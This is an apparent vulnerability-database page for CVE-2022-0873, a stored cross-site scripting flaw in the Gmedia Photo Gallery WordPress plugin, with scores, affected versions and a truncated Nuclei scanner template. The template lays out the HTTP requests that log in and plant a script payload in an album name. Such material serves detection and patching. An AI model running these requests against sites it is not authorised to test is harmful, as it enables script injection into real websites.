CVE-2022-0873
published 2022-05-16CVE-2022-0873: The Gmedia Photo Gallery WordPress plugin before 1.20.0 does not sanitise and escape the Album's name before outputting it in pages/posts with a media embed…
PriorityP421medium4.8CVSS 3.1
AVNACLPRHUIRSCCLILAN
EXPLOIT
EPSS
0.85%
53.7th percentile
The Gmedia Photo Gallery WordPress plugin before 1.20.0 does not sanitise and escape the Album's name before outputting it in pages/posts with a media embed, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered-html capability is disallowed
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| codeasily | gmedia_gallery | < 1.20.0 | 1.20.0 |
CVSS provenance
nvdv3.14.8MEDIUMCVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WordPress Gmedia Photo Gallery Plugin < 1.20.0 - Cross-Site Scripting
nuclei·CVSS 4.8
CVE-2022-0873 [MEDIUM] WordPress Gmedia Photo Gallery Plugin < 1.20.0 - Cross-Site Scripting
WordPress Gmedia Photo Gallery Plugin alert(document.domain)"
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=GrandMedia_Albums HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=GrandMedia_Albums HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
term[name]={{payload}}&term[description]=&term[meta][_orderby]=ID&term[meta][_order]=DESC&term[meta][_module_preset]=&term[global]=1&term[status]=publish&_wp_original_http_referer={{BaseURL}}/wp-admin/admin.php?page=GrandMedia_AddMedia&_wpnonce_terms={{nonce}}&_wp_http_referer=/w
No writeups or analysis indexed.
2022-05-16
Published